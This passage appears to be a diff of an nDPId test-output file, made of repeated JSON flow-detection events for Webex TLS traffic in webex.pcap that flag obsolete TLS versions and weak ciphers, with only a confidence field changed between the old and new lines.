{"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} -01395{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":336,"source":"webex.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570636248,"flow_last_seen":1444570636703,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2579,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":500,"midstream":0,"thread_ts_msec":1444570636703,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.104.140","src_port":44492,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} -01394{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":341,"source":"webex.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570636255,"flow_last_seen":1444570636706,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2920,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1444570636706,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.4.76","src_port":52730,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} -01395{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":347,"source":"webex.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570636170,"flow_last_seen":1444570636773,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":661,"midstream":0,"thread_ts_msec":1444570636773,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.153","src_port":57647,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} -01394{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":355,"source":"webex.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570636364,"flow_last_seen":1444570636827,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":667,"midstream":0,"thread_ts_msec":1444570636827,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.98","src_port":37129,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} -01395{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":356,"source":"webex.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570636387,"flow_last_seen":1444570636828,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":667,"midstream":0,"thread_ts_msec":1444570636828,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41386,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} -01394{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":357,"source":"webex.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570636359,"flow_last_seen":1444570636829,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2579,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":500,"midstream":0,"thread_ts_msec":1444570636829,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.97","src_port":51370,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} -01395{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":365,"source":"webex.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570636259,"flow_last_seen":1444570636894,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":667,"midstream":0,"thread_ts_msec":1444570636894,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.100","src_port":52219,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} -01394{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":368,"source":"webex.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570636264,"flow_last_seen":1444570636897,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":667,"midstream":0,"thread_ts_msec":1444570636897,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.99","src_port":55969,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} -01395{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":381,"source":"webex.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570636155,"flow_last_seen":1444570636963,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2527,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1444570636963,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.204.49","src_port":51646,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} +00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":324,"source":"webex.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636387,"flow_last_seen":1444570636397,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636397,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41386,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01394{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":328,"source":"webex.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570636180,"flow_last_seen":1444570636471,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2527,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1444570636471,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.231.3","src_port":45814,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} +01397{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":335,"source":"webex.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570636160,"flow_last_seen":1444570636701,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":661,"midstream":0,"thread_ts_msec":1444570636701,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"209.197.222.159","src_port":47498,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} +01395{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":336,"source":"webex.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570636248,"flow_last_seen":1444570636703,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2579,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":500,"midstream":0,"thread_ts_msec":1444570636703,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.104.140","src_port":44492,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} +01394{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":341,"source":"webex.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570636255,"flow_last_seen":1444570636706,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2920,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1444570636706,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.4.76","src_port":52730,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} +01395{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":347,"source":"webex.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570636170,"flow_last_seen":1444570636773,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":661,"midstream":0,"thread_ts_msec":1444570636773,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.153","src_port":57647,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} +01394{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":355,"source":"webex.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570636364,"flow_last_seen":1444570636827,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":667,"midstream":0,"thread_ts_msec":1444570636827,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.98","src_port":37129,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} +01395{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":356,"source":"webex.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570636387,"flow_last_seen":1444570636828,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":667,"midstream":0,"thread_ts_msec":1444570636828,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41386,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} +01394{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":357,"source":"webex.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570636359,"flow_last_seen":1444570636829,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2579,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":500,"midstream":0,"thread_ts_msec":1444570636829,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.97","src_port":51370,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} +01395{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":365,"source":"webex.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570636259,"flow_last_seen":1444570636894,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":667,"midstream":0,"thread_ts_msec":1444570636894,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.100","src_port":52219,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} 